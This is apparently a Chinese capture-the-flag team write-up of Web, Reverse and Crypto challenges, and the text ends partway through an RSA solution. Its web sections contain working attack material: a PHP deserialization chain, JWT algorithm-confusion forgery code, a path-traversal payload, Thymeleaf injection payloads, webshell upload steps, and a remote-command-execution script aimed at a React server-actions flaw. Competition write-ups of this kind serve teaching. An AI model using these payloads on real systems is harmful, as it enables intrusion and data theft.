文章目录
Web
AI_WAF
提示词注入 + SQL注入
数据库名:nexadata
表名:article,where_is_my_flagggggg
字段名:Th15_ls_f149
flag:
dedecms
随便注册一个账户,上去以后可以看到有个用户叫Aa123456789
该用户账号密码都是Aa123456789
后台登陆上去,发布一个新的文章,在缩略图处传马
蚁剑连上
hellogate
jpg图片尾有一段php:
<?php
error_reporting(0);
class A {
public $handle;
public function triggerMethod() {
echo "" . $this->handle;
}
}
class B {
public $worker;
public $cmd;
public function __toString() {
return $this->worker->result;
}
}
class C {
public $cmd;
public function __get($name) {
echo file_get_contents($this->cmd);
}
}
$raw = isset($_POST['data']) ? $_POST['data'] : '';
header('Content-Type: image/jpeg');
readfile("muzujijiji.jpg");
highlight_file(__FILE__);
$obj = unserialize($_POST['data']);
$obj->triggerMethod();<code><span style="color: #000000">
<span style="color: #0000BB"><?php<br />error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);<br />class </span><span style="color: #0000BB">A </span><span style="color: #007700">{<br /> public </span><span style="color: #0000BB">$handle</span><span style="color: #007700">;<br /> public function </span><span style="color: #0000BB">triggerMethod</span><span style="color: #007700">() {<br /> echo </span><span style="color: #DD0000">"" </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">handle</span><span style="color: #007700">; <br /> }<br />}<br />class </span><span style="color: #0000BB">B </span><span style="color: #007700">{<br /> public </span><span style="color: #0000BB">$worker</span><span style="color: #007700">;<br /> public </span><span style="color: #0000BB">$cmd</span><span style="color: #007700">;<br /> public function </span><span style="color: #0000BB">__toString</span><span style="color: #007700">() {<br /> return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">worker</span><span style="color: #007700">-></span><span style="color: #0000BB">result</span><span style="color: #007700">;<br /> }<br />}<br />class </span><span style="color: #0000BB">C </span><span style="color: #007700">{<br /> public </span><span style="color: #0000BB">$cmd</span><span style="color: #007700">;<br /> public function </span><span style="color: #0000BB">__get</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">) {<br /> echo </span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cmd</span><span style="color: #007700">);<br /> }<br />}<br /></span><span style="color: #0000BB">$raw </span><span style="color: #007700">= isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'data'</span><span style="color: #007700">]) ? </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'data'</span><span style="color: #007700">] : </span><span style="color: #DD0000">''</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">header</span><span style="color: #007700">(</span><span style="color: #DD0000">'Content-Type: image/jpeg'</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">readfile</span><span style="color: #007700">(</span><span style="color: #DD0000">"muzujijiji.jpg"</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">$obj </span><span style="color: #007700">= </span><span style="color: #0000BB">unserialize</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'data'</span><span style="color: #007700">]);<br /></span><span style="color: #0000BB">$obj</span><span style="color: #007700">-></span><span style="color: #0000BB">triggerMethod</span><span style="color: #007700">();</span>
</span>
</code>反序列化:
<?php
class A {
public $handle;
public function triggerMethod() {
echo "" . $this->handle;
}
}
class B {
public $worker;
public $cmd;
public function __toString() {
return $this->worker->result;
}
}
class C {
public $cmd;
public function __get($name) {
echo file_get_contents($this->cmd);
}
}
$c = new C();
$c->cmd = "/flag";
$b = new B();
$b->worker = $c;
$a = new A();
$a->handle = $b;
echo urlencode(serialize($a));
?>
Deprecated
JWTutil.js:
const jwt = require('jsonwebtoken');
const fs = require('fs');
const publicKey = fs.readFileSync('./publickey.pem', 'utf8');
const privateKey = fs.readFileSync('./privatekey.pem', 'utf8');
module.exports = {
async sign(data) {
data = Object.assign(data);
return (await jwt.sign(data, privateKey, { algorithm:'RS256'}))
},
async decode(token) {
return (await jwt.verify(token, publicKey, { algorithms: ['RS256','HS256'] }));
}
}签名用的RS256,验证HS256也能用,爆破公钥最后用HS256校验就能伪造admin
随便注册获取两个jwt:
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAyODQ5fQ.abAPCEOr-bI3twCxOYz8iK5pvpkqaUjcZ-73NdLWMU-6A6PXo26euRvzKJqN01XXu2fmjrfMKhZxXMuNxYuA20AatZ7U5cFGdNlBIFQRNUh2kVk5PVC6kt9NR0Xp8suFtLsL6IR-d4g-khPI0WkF2um6Pw1uXGWjR-jew9QwM8Q
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjIiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAyOTMwfQ.YDlWRLKn1DUBwIlz8ZyXUVXlbclCkKEgLxQ6ERbgimtaoVyZCV5cgSIhLCkXj8A2hHVQ8ln7SGVTMBPE880eUXlQcrBFJ1LTTzRaF8MxBDCPWqt2nFe6eFX6xO_Re0bqMP2cRnxFqfkOlAGF9o02XbKDP1Iq9AFrCJfnbJMwzTcrsa_sign2n:
伪造jwt:
from pathlib import Path
import jwt
import pickle
import base64
path = Path('.')
for file in path.glob('*.pem'):
with open(file.name, 'rb') as key:
token=jwt.encode(
payload={
"username": "admin",
"priviledge": "File-Priviledged-User",
"iat":"1766891616",
},
key=key.read(),
algorithm='HS256'
)
print(token)
print("---")输出中第二个jwt可以绕过验证:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicHJpdmlsZWRnZSI6IkZpbGUtUHJpdmlsZWRnZWQtVXNlciIsImlhdCI6IjE3NjY4OTE2MTYifQ.1w3xk_xtkOYBCRWwAH417fTMdjHSyBsRSJUdDd1FmwM
---
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicHJpdmlsZWRnZSI6IkZpbGUtUHJpdmlsZWRnZWQtVXNlciIsImlhdCI6IjE3NjY4OTE2MTYifQ.BMkaCC8Mhnv2xNFTrUhnAhAIKFN4MfHH_8IsxAEIPPA
---
checkfile:
router.get('/checkfile', AuthMiddleware, async (req, res, next) => {
try{
let user = await db.getUser(req.data.username);
if (user === undefined) {
return res.send(`user ${req.data.username} doesn't exist.`);
}
if (req.data.username === 'admin' && req.data.priviledge==='File-Priviledged-User'){
let file=req.query.file;
if (!file) {
return res.send('File name not specified.');
}
if (!allowedFile(file)) {
return res.send('File type not allowed.');
}
try{
if (file.includes(' ') || file.includes('/') || file.includes('..')) {
return res.send('Invalid filename!');
}
}
catch(err){
return res.send('An error occured!');
}
if (file.length > 10) {
file = file.slice(0, 10);
}
const returned = path.resolve('./' + file);
fs.readFile(returned, (err) => {
if (err) {
return res.send('An error occured!');
}
res.sendFile(returned);
});
}
else{
return res.send('Sorry Only priviledged Admin can check the file.').status(403);
}
}catch (err){
return next(err);
}
});数组绕过 https://ahmed-belkahla.me/post/csictf2020/,payload:
file[]=../../&file[]=../../&file[]=../../&file[]=../../&file[]=../../&file[]=../../&file[]=../../&file[]=../../&file[]=../../&file[]=../../flag.txt&file[]=.&file[]=logEzJava
弱口令:admin/admin123 登进后台,thymeleaf 注入
列出根目录下文件:
<p>现在时间: <span th:text="${T (java.util.Arrays).toString(T (java.io.File).listRoots()[0].list())}"></span></p>
flag被过滤了,拼接绕过读 /flag_y0u_d0nt_kn0w:
<p>现在时间: <span th:text="${T (java.nio.file.Files).readString(T (java.nio.file.Paths).get(T (java.lang.String).join('','/fla','g_y0u_d0nt_kn0w')))}"></span></p>
Redjs
考验看不看新闻的题(?
# /// script
# dependencies = ["requests"]
# ///
import requests
import sys
import json
BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
EXECUTABLE = sys.argv[2] if len(sys.argv) > 2 else "id"
crafted_chunk = {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": '{"then": "$B0"}',
"_response": {
"_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
# If you don't need the command output, you can use this line instead:
# "_prefix": f"process.mainModule.require('child_process').execSync('{EXECUTABLE}');",
"_formData": {
"get": "$1:constructor:constructor",
},
},
}
files = {
"0": (None, json.dumps(crafted_chunk)),
"1": (None, '"$@0"'),
}
headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)
print(res.status_code)
print(res.text)
Reverse
Eternum
分析流量,可以看到各个帧的结构还是比较规则的。起始8字节是固定magic number:ET3RNUMX。之后4字节长度,后面没什么规则,应该是数据。
Ubuntu虚拟机中运行程序,命令行参数为物理主机的ip,开始调试
交叉引用找到可疑字符串,长度刚好32字节,经过调试确认为密钥。
后面不远的sub_6584A0函数,发现通过异或生成了ET3RNUMX字符串,猜测这部分和数据包有关。
继续分析,使用了AES-GCM,向量nonce和tag也被放在流量包中,没有用AAD。
写个脚本把包体中的参数拆出来。
import struct
MAGIC_NUMBER = b'ET3RNUMX'
MAGIC_SIZE = 8
LENGTH_SIZE = 4
NONCE_SIZE = 12
TAG_SIZE = 16
def parse_frame(data_bytes):
magic = data_bytes[:MAGIC_SIZE]
length_bytes = data_bytes[MAGIC_SIZE:MAGIC_SIZE + LENGTH_SIZE]
data_length = struct.unpack('<I', length_bytes)[0]
data_start = MAGIC_SIZE + LENGTH_SIZE
data_end = data_start + data_length
encrypted_data = data_bytes[data_start:data_end]
encrypted_data_len = len(encrypted_data) - NONCE_SIZE - TAG_SIZE
if encrypted_data_len < 0:
return "错误: 数据格式不正确"
nonce = encrypted_data[:NONCE_SIZE]
encrypted_content = encrypted_data[NONCE_SIZE:NONCE_SIZE + encrypted_data_len]
tag = encrypted_data[:TAG_SIZE]
return {
'magic': magic,
'data_length': data_length,
'nonce': nonce,
'encrypted': encrypted_content,
'tag': tag,
}
def print_parsed_result(result):
if isinstance(result, str):
print(result)
return
print(f"Length: {result['data_length']}")
print(f"Nonce: {result['nonce'].hex()}")
print(f"enc_len: {len(result['encrypted'])}")
print(f"enc_data: {result['encrypted'].hex()}")
print(f"Tag: {result['tag'].hex()}")
if __name__ == "__main__":
frame_list = [
"455433524e554d5800000034c96e7de65400a76b2122b0584b544c1d99760e0a2d9e91e81673bf99172ee000e690a58c8431a2fab77bd4a304ed89d5964e872e",
"455433524e554d5800000033c8250252aab6d388bd562cee09f4ce88dad989dcc4d50f400b2c2c99b0e667ecc635b0d26fd5f3fafab1c67a883bc380c3f726",
"455433524e554d5800000034d70228e9e42faa665cd6fad4f3a943ae4d16464a94ac2fa7976300c1db22d78caec13b77c9b82b8c3fc92732e96a8389ed2992f7",
"455433524e554d580000002f12d29894ae5835bed448531df3e9b2c1e286b82715660d985dc6003af0787b361ede4cd277cbc19574c4c412a8ef7d",
"455433524e554d580000005674e53ec9890140f222055846f60152892972b1cc1fa94a9b4055235a59a6a868a133f7676d14d8466a6606575bed32589b521d95e8e30600ad764f5344e26751a7d16fc059cbe9931d73f11ae406b4390ac75bfab27f",
"455433524e554d5800000031974d385b582644a3b9645621c3bec8807b21e3bc408cd4d9107d75445fb598a0a6b85d6ab0f2f1a35e8dd07be9d62a96ff",
"455433524e554d58000000a75f8fa8326a5bdda485d607d86f4f06b8c850a2f4459671932effe3bfb0d67b88716efeb63fcd70cf96ff81cb74442323dfac82eb75151c8fc98e51129ff1b01d2c1f61b7d0f58a1127f40895c569bcb18f988a0585f2edb9e33728536fdbcc45d09943d1f624461749070b1f8fdfe124e66ccc2cfd68dcbeb0fbce7f886341642807499c75a6fc9034386011cc08957ae8144ab1707f3f018503233eb10f32c829e7117a04110d",
"455433524e554d5800000034b93b44044e3130b2137e90aec2b051e13c1acffa13b0d6e01d398dabaadd1f62fdc7e17e7484044c5b50fd92d6c6d0f8dcd67785",
"455433524e554d580000003f872c6507818f6518c30f3e101c2e7c4611c4053040a4e6caa5eeeccb2c4501c18db589e800248c3ec635f1fa9a00aa0e5c75b4a57fbe4287a52e8c206f9a67",
"455433524e554d5800000034a04e3ac38266d7fbfea1d4632b90f7d2069d0df8ee589079ee102455800096ca9aaa24e4859a6bc327b5ae02b5e36f4d3fd991c6",
"455433524e554d5800000072f878524c5f257d9ab943ecb679d0c5f650e0dc25d0639c7d36bd16798f0bdddaa6849515265d686320bdff2cf7b5679cf9f43ed919cbeef7a985d665d533e6a01c510cc79f053e2b510b2e3202b3d5a621fccd828798387464f99dc254d26c419639fe8e3547548aeebff7ec7a285f77ad1c",
"455433524e554d580000003894cc70d4ac89d1cedcbcb96e3709024e760bbab6173b758f2c5237295cf59bece700c3f7f93fad0b037cf662a1dda82e3429154800b85d0d",
"455433524e554d5800000036d36ea8e9f66335df606f4eb11834cddba67d06d06471b09a92325478b1d8878bab067c9b0fc9708ec52d1e5c2e741a8d617799b37c9c",
"455433524e554d580000003f4968dccf4788b006b221beab05a4f33482c047825d504861a12f342175feb7a27f905588636458448ee86e7542dc43c5f9e8f732e4be441ed48b5614642f0b",
"455433524e554d5800000078fc3d8084493236eccfec4ce55cffb4a67ac1e5ce4e636f7ed070e0f563e4b6f276454a9c727a88769a2bae594c80b9673c156739570c9d94c590fd41ef77ea348bf55649cbec9aa252aa18943ebb8cb4c1b8940fdf5fe9508a71d2912b30607b2601c10a4fdfdf3e287d31ffd54d2dd3d4a9da40646fa488",
"455433524e554d5800000030946086de7ef8fd2a87b745884994953b27827a328cadef29c8ba96786e6d711b79717cd2c44423fab555f76401affdfe",
"455433524e554d5800000035613970801db07bc7c25e779c5a5da0360b34e4a53ce424787b4a57df23a0dc859bad9cea471457434e5be2d0ef9e2c6eb95d79b348",
"455433524e554d58000000351582ea3acaf7e4e3e709c4a3aa2387b5b396ddc6a4044d0a32ce46501f233c50bacd42d3038fc28d85fe18d84ceae7060404fa5f9c",
"455433524e554d580000009a12668fa3b801e4b30ba7d06931a8f0dddc707d096f9e79c45bfb90bc5bda31774430e8ba73715f4cb60e39dc19ea936809104830e5a0e33856cbaf76f87d95fb0d30d6b7db64c4a325df09f7cdf1db58267c7766dcfb84b0081fa9da9fc944d07d976a532c0d507d186caaed08a7044c9a5d3546b77c260b3f397655e2a4d21c55fe10460549ebed1c2413eca7f3d0e59c1cbea149e58eb13795",
"455433524e554d5800000037583fa18bf2208149334fcdef3e2d2a9ca7d1252d04d05573383c83df35f59b982b85b62cc934f789dee7f6eb50186cb905319504eb4dad",
"455433524e554d580000080049bc06fc6c7d22431da6da25160583849672dbaf1b29ed87ec3b6dda2d0508c31dc75d89eb54f195ffeec28d93b8523f80738b900f06dd95c89f0535a8d3dfcfe0e3ba4dcc9de35556eb1440541192fcded49c01723c0f3c0274372073ec500ef451519fd4dfc9eb57245e35375ed7909144a99d53fa575a72251903e4fe25620e21477832882f10895c174d453f7545004b43c5cbb512a2bd725451fad670a9d9bc1d92ba34f940f97359095cac5411dd9d9d4e660a251087cc542c6e308c29d30a872f81433d1a866715dca84f5f4e1be9f4ef090bf9710d3f553899b4411424260c790a1772e26d3a80fd47e7be418cf133279a868edd7fb20a0edcfaeda2fcfad237a027e4311e562d074b573bd71f017adc80ed26c28b02bd5a747ee1bcf07d10302047d2e98c9c3f07f9f0f109ab282b5052d2fef0bbea7447231d1a28216adcf537f67a9d4f45f8c372b44bb0c8cdb632c833a86a656339e5b77ee6ea640e4048cb2d19d6f33a99c487c1281e190a85b12791899c0111e45f2b428db843667ac0dc3ec067da1d1607ef3c795bcb653e0686f7f73f98bb7725f804a2df220ea998c443767ccc2e51585ce55b44af9abdf13e5d1a82b2a64a2af59c21a1d9c9f6a481b3ed57d66d0e72cf113b7c93786ba392e884110ffad4719aec924e8d9d34807d9102bef22a183391deb9025749afaf984671513da34a6b3b107cd7ec7a17f256924000fab065cb4c5b622b32a4178547dd3ceff92f524e3214d2f6ed97d394faf7ec303195bcd5cb546475f00a33c389309b235b6cc5015f48d8500fb3560cd1e613e081f15968de252a1edbf90bcaf03cf22e628f2b8248f3ed1916257f0188d93c99afe49f28a294aa14897ffcac7a36202bc63edf0375356ec958d9de74a7f69bddf0c5f0e8777679b9a9064bca8606fe178fec280ed4958fb026f2c357928a2c508af4692ecc109dff0e6075e4bf8686c1e94e4bf89b1586f80c094456c6c05bfb61efa886574b79f4326cb4f0728392f967e6e44ece34298d6f2d256cfd0357e2e3140f7fa52f81ec9a43662b00d82c6ec209d58fa032fb22feb0ae868d9813f48c7630d917401c0f6b8154556a5aaf21249d9368d54afda7bfdc1245b045329d9627b35b287eb0107bb6f2f5d5fd828e81fa7b76b0017a621a0b8ed44168c34311a7f35ccb347a850276f31beebb6179c49d25f4bb77401f1b6bfc9f67fa5cd659c5a49ea9d06baea8fe408d1f4e5e10732c41a1cdaa94d5357cb3b0e7700822852e65094094de277def4db147cccb771809f7c612f1d42e9e6898b36a1f394914a9ff69eb88d5887feaed39c8ca6666d483b027da3e2d855714abc26900b32f71f50437ebc00f038313583e1077d49de2e587afb5f6f097bb51c2e276817503065f6436f6d97331965fe48b58fb05c89f7950a655c9ffbea684d6d71b6bd2eb21acb26affcdc2640d6559fca8736956df805a40a0847fdd18c952b6f1a4a49660528d49ea2d52e99c76825426724f84a1fde0c985e8da743c8e22ba42b443f9f62e6fff41a8ff89fcea76b7c423abb58c2105663f4335292dabff154d0e423d596b868840717d6bc4d29d5f3661e1353008db98617ca9727bfd6e12154553ada7fab7afac28ab4113fc218c9fdd20304a0f6e8afaf94b3a76a45201d4f5d99c9d70ff69827d532cad6abbeeda0181674cb87607ba84e73bd8ddbf690f65e9591a2b6246e0148a8f3c619d8b9b0504c7d075bf425bcfda8426885a3674ec416b034602ccf85e1377d6e9e82b7a5bbdd54280685f2db01c79136e539a598ff3024fcfcce4df1efb8e6e780ccb7dec9ac99d0dfb416f9cd7a87f0bc9c11f303808c82fb226c74e8c439d3cb865921d06f43d800526ed98deda24cc327a175378335465f02a5ecfbff9cc3f6a04af2d5544b6b254bdbe988e4c5d0fc0298dffbb8af82bad8c6f06d281ee133ec808894582b1fd645419e94d675b6f622020936396ee4791902f9a8714e17d67af7036fef91420cba565125ee2ccc7f5484c64cc621a8a8be2ae34d47f9f4202a7e2aeec9064db8fc8ebddcb0695cf107eadf2a73aa8246dd3787751acb0a05df3b3f2b3f5fa7b46e2538bd992b37719e2abceeeaf5b71bff79fd471a3cdb44a2886c26b23ce48dbfaf49f31187affe22334d626f55f0e5eb67016f9c3294f071cd723a58bced968d7263b15ce7a345ce45ad65195535261678aa29ef633f524ff9f2b5fb31598a8cbcf2af59a30cb7543c73e5b8efc85bb8038e232c24de87e9ac81fc5c5d34a8c171f0385eefe4c6a9554c85ad5bb360c7b69dcf5aa9a3741bfcf4917c2f442c1d829f624f2134a9509d43ee429e1f41bafc2545455a85d8dc70124b3e5230ddd72cd9afc33c07961e66deb464e072d9d9fe8ef5006a1dff7487412d92c5407f11c5fc0bedf474c73ba97fe554aec6ca0c5dec7456e747e04ffdacde4bb712884cce8f0174d04e3d920e0fd0d464e5075760cf5ba90904a4d47894834797809c185500bc41ec2fcf4301b0c579a66fc96c3558f0c22a9bb0459b7f1012b9d0185f4f6da8b1b3be6242718925ea86f3b72d709444a712b293fc2377b1975542e5801d36632509eb239c068e9be6928a5b589d456722d7f28f12e9048b1f5b9e922b5392e927a03fc2acc8ec9bdb65299c6942a143b4d4eba13653106491da7a25f3a60e8d278ec75000db80017fe5202a6e46498cee5fb2de51c90bffeee6117511f602efb3f27102e562f301ebb5e2befe8a3259c9d007f34e79afbcf8f0b1ea9a24591ebb9894cbba84370b4172cfd387379e334c30c57fc27f139e49761c300629ab999a68b4e23ca2af415e8fd4f277b71d7325aa4e83635e9fe563649d8e53838cf6588",
"455433524e554d5800000030118e60794250128d6d64d58ed750353ccd24fa15b9710a862e2647d659580f5f088ee9eb846f046e98fe787a6bcba928",
"455433524e554d580000003b4213f911ba0ccd4958e1b95b2f33745a39b379f991f187e9a43d8ea19e077f6ea6006d9d54d60a8a594d178a6f0e3570b3cab5c391b6904fbe6fc7",
"455433524e554d580000003a3be4daa4a657c2f1e2d25d3485901cf0dfa7d7e8e546715f3f7f5d7c6b75e60704e7ce40bb1bf398d02d08be53353fc8d3bdfcaeae61a0928089"
]
for (id,frame) in enumerate(frame_list):
result = parse_frame(frame)
print(id)
print_parsed_result(result)
print("--------------------------------------------------")依次在cyberchef解密
第14个帧解密后有一个显眼的base32编码,解码即为flag。
flag{b7c58700-2b01-4dd4-8526-a4a47a65a1a9}
wasm-login
分析html部分的脚本,导入release.js和release.wasm后,本地调用authenticate。
wasm转成wat逆向分析,验证流程如下:
- 密码预处理:使用换表Base64编码
- 时间戳处理:转换为十进制,UTF-8编码字符串
- 构造中间JSON:{"username":"xxx","password":"Base64密码"}
- 计算签名:使用时间戳作为密钥,计算HMAC-SHA256,结果再次换表Base64编码
- 最终结果:{"username":"xxx","password":"Base64密码","signature":"Base64签名"}
模拟服务端的验证,对整个JSON又进行一次md5,给出了check hash的前几字符。
已知测试账号 admin 测试密码 admin。但是题目没有明确给出时间戳,只是一个大致的时间范围,可能需要爆破时间。
修改release.js以便于hook修改时间戳
以1小时为时间段,从 2025-12-21 12:00:00.000 UTC 开始。import { authenticate } from "./release.js"; import crypto from 'crypto';
async function run() {
const step = 1;
const start = 1766332800000;
const end = 1766336400000;
const check = "ccaf33e3512";
for (let t = start; t < end; t += step) {
globalThis.timestamp = t;
var result = authenticate("admin", "admin");
var json = JSON.parse(result);
var str = JSON.stringify(json);
var hash = crypto.createHash('md5').update(str).digest('hex');
if (hash.startsWith(check)) {
console.log(`Data: ${t} ${str}`);
console.log(`Hash: ${hash}`);
process.exit(0);
}
}
console.log(`None`);}
run();
Data: 1766334550699
{"username":"admin","password":"L0In602=","signature":"LxZiwA05Y9h7wX1CI0gUitOE2LBy9y8McoBqWgKIdDo="}
Hash: ccaf33e3512e31f36228f0b97ccbc8f1
## Babygame
gdre_tools解包出游戏脚本。
flag.gdc 直接看到 AES-ECB,注意密钥被修改。
var score = 0
func add_point():
score += 1
if score == 1:
Flag.key = Flag.key.replace("A", "B")
fan.visible = true
# Crypto
## ECDSA
疑似考格的题被不小心弄成了签到题?
题目采用了ECDSA签名,使用NIST521p曲线
可以发现每次签名的信息(b"message-" + bytes([i]))和随机数 nonce(int.from_bytes(sha512(b"bias" + bytes([i])).digest(), "big"))都是可预测的
自然由ECDSA签名方程 $$s_i \equiv k_i^{-1} (H(m_i) + r_id) \bmod n$$可得$$d \equiv (k_is_i-H(m_i))r_i^{-1} \bmod n$$
更多组数据只是确认解正确而已
唯一卡了很久的是其最后提交flag的格式实际上是str(d).encode()的MD5值(说好的long_to_bytes(priv_int, 66)呢???
exp:
```python
from ecdsa import VerifyingKey,NIST521p
from hashlib import sha512,sha1,md5
from Crypto.Util.number import long_to_bytes
import random
import binascii
import sys
uh = lambda x: binascii.unhexlify(x.encode())
def nonce(i):
seed = sha512(b"bias" + bytes([i])).digest()
k = int.from_bytes(seed, "big")
return k
n = NIST521p.order
mls = []
sigls = []
raw = open('signatures.txt').readlines()
for l in raw:
rm, rs = l.strip().split(':')
mls.append(uh(rm))
sigls.append(uh(rs))
for i in range(len(sigls)): # 60
bt = sigls[i]
sigls[i] = (int.from_bytes(bt[:66]),int.from_bytes(bt[66:])) # r,s
for i in range(60):
r,s = sigls[i]
m = mls[i]
k = nonce(i)
H = int.from_bytes(sha1(m).digest())
d = (k*s - H) * pow(r,-1,n) % n
print(f'flag{{{md5(str(d).encode()).hexdigest()}}}')</code></pre>
<p><img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912074590.png" alt="" />
flag{581bdf717b780c3cd8282e5a4d50f3a0}</p>
<h2>Ezflag</h2>
<p>先进行逆向,发现存在一个类似斐波那契+十六进制换表的flag“生成”逻辑
<img src="https://ctf.njupt.edu.cn/wp-content/uploads/2026/02/2026021912080397.png" alt="" /></p>
<p>直接搓就可以,注意枚举可得索引表的周期是24,因此原程序中v1的调用直接改为索引取fib[v%24]
还有就是python中需要模拟C的ull溢出逻辑(取低64位)
exp:</p>
<pre><code class="language-python">def fibls():
ls = [0,1]
for i in range(22):
ls.append(ls[-2]+ls[-1])
ls[-1] &= 0xf
return ls
if __name__=='__main__':
K = "012ab9c3478d56ef"
fib = fibls()
v = 1
opt = ''
for n in range(32):
opt += K[fib[v%24]]
if n in (7,12,17,22):
opt += '-'
v = v*8 + n + 64
v %= 2**64
print(opt)
</code></pre>
<p>flag{10632674-1d219-09f29-14769-f60219a24}</p>
<h2>RSA_NestingDoll</h2>
<p>已知 outer<em>n 的因子均为(部分的)光滑数(具体地,$$p' = p\cdot \prod</em>{i=1}^{n}s_i,s_i \leq 2^{20}$$),通过 Pollard's p-1 算法即可提取出 inner<em>n 的所有因子
因此处涉及四个质数之积,且构造时使用的 getPrime(20) 生成的质数较小,极易在相邻的素数区间中出现重叠,直接使用传统的完整阶乘 $$B!$$ 计算会导致 $$g^E$$ 同时命中多个 $$p'$$ 的倍数阶乘,从而使计算出的 $$gcd(g^E-1, n)$$ 等于多个外因子的乘积,甚至直接等于 $$n$$,无法有效分离出单个因子
故需将小素数集合分块处理,为加快程序运行设定快速移进指数 $$E = \prod</em>{i=1}^{n}p<em>i^{\lfloor \log</em>{B}p<em>i \rfloor}$$,若出现 $$gcd \geq n$$ (即“溢出”)的情况,则回退到该块内逐个素数进行模幂运算,以获取单一外因子
该算法在成功分解一个 outer 因子 $$p'$$ 后,可计算 $$gcd(p'-1,n</em>{inner})$$ 提取对应的内圈质数,重复直至得到全部四个内圈质数即可
分解代码:</p>
<pre><code class="language-python">from sage.all import *
def f(n, n1):
B = 2**20
A = []
x = n
y = n1
g = pow(2, y, x)
z = 200
q = list(primes(B))
t = len(q)
i = 0
while i < t and len(A) < 4:
u = g
E = 1
for j in range(i, min(i + z, t)):
p = q[j]
E *= p ** (B.bit_length() // p.bit_length())
g = pow(g, E, x)
d = gcd(g - 1, x)
if d == 1:
i += z
continue
if d < x:
v = gcd(d - 1, y)
if v > 1:
A.append(v)
y //= v
x //= d
g %= x
continue
g = u
for j in range(i, min(i + z, t)):
p = q[j]
k = B.bit_length() // p.bit_length()
g = pow(g, p ** k, x)
d = gcd(g - 1, x)
if 1 < d < x:
v = gcd(d - 1, y)
if v > 1:
A.append(v)
y //= v
x //= d
g %= x
break
i += z
if len(A) == 3 and y != 1:
A.append(y)
return A
if __name__=='__main__':
a = 484831124108275939341366810506193994531550055695853253298115538101629337644848848341479419438032232339003236906071864005366050185096955712484824249228197577223248353640366078747360090084446361275032026781246854700074896711976487694783856878403247312312487197243272330518861346981470353394149785086635163868023866817552387681890963052199983782800993485245670437818180617561464964987316161927118605512017355921555464359512280368738197370963036482455976503266489446554327046948670215814974461717020804892983665655107351050779151227099827044949961517305345415735355361979690945791766389892262659146088374064423340675969505766640604405056526597458482705651442368165084488267428304515239897907407899916127394598273176618290300112450670040922567688605072749116061905175316975711341960774150260004939250949738836358264952590189482518415728072191137713935386026127881564386427069721229262845412925923228235712893710368875996153516581760868562584742909664286792076869106489090142359608727406720798822550560161176676501888507397207863998129261472631954482761264406483807145805232317147769145985955267206369675711834485845321043623959730914679051434102698588945009836642922614296598336035078421463808774940679339890140690147375340294139027290793
b = 16141229822582999941795528434053604024130834376743380417543848154510567941426284503974843508505293632858944676904777719167211264225017879544879766461905421764911145115313698529148118556481569662427943129906246669392285465962009760415398277861235401144473728421924300182818519451863668543279964773812681294700932779276119980976088388578080667457572761731749115242478798767995746571783659904107470270861418250270529189065684265364754871076595202944616294213418165898411332609375456093386942710433731450591144173543437880652898520275020008888364820928962186107055633582315448537508963579549702813766809204496344017389879
print(f(a,b))
# [12094541303222723616975666632268830751848445571951987169074250626437877110205699058506111384472586354084793914769711672322551034923778729430162356351731919, 12640586780178354278771080052383497749869399865273557422350740376242446319503391917174055513935117677336547258288132280151433761630655572270163827336131139, 8032658322599620029480213181968895812810902172967093552713506521436300000398610054134219799747232115213014217973189950145890725588704391460190522209172659, 13143792383429631567176338805648361858645034742838692599578815532866468916133309392038207913937396336227239361151049752128445345075961851450420118805042241]</code></pre>
<p>得到$$n$$的因数分解后就是常规的RSA解密</p>
<pre><code class="language-python">from sage.all import *
from Crypto.Util.number import *
p,q,r,s = [12094541303222723616975666632268830751848445571951987169074250626437877110205699058506111384472586354084793914769711672322551034923778729430162356351731919, 12640586780178354278771080052383497749869399865273557422350740376242446319503391917174055513935117677336547258288132280151433761630655572270163827336131139, 8032658322599620029480213181968895812810902172967093552713506521436300000398610054134219799747232115213014217973189950145890725588704391460190522209172659, 13143792383429631567176338805648361858645034742838692599578815532866468916133309392038207913937396336227239361151049752128445345075961851450420118805042241]
n1=16141229822582999941795528434053604024130834376743380417543848154510567941426284503974843508505293632858944676904777719167211264225017879544879766461905421764911145115313698529148118556481569662427943129906246669392285465962009760415398277861235401144473728421924300182818519451863668543279964773812681294700932779276119980976088388578080667457572761731749115242478798767995746571783659904107470270861418250270529189065684265364754871076595202944616294213418165898411332609375456093386942710433731450591144173543437880652898520275020008888364820928962186107055633582315448537508963579549702813766809204496344017389879
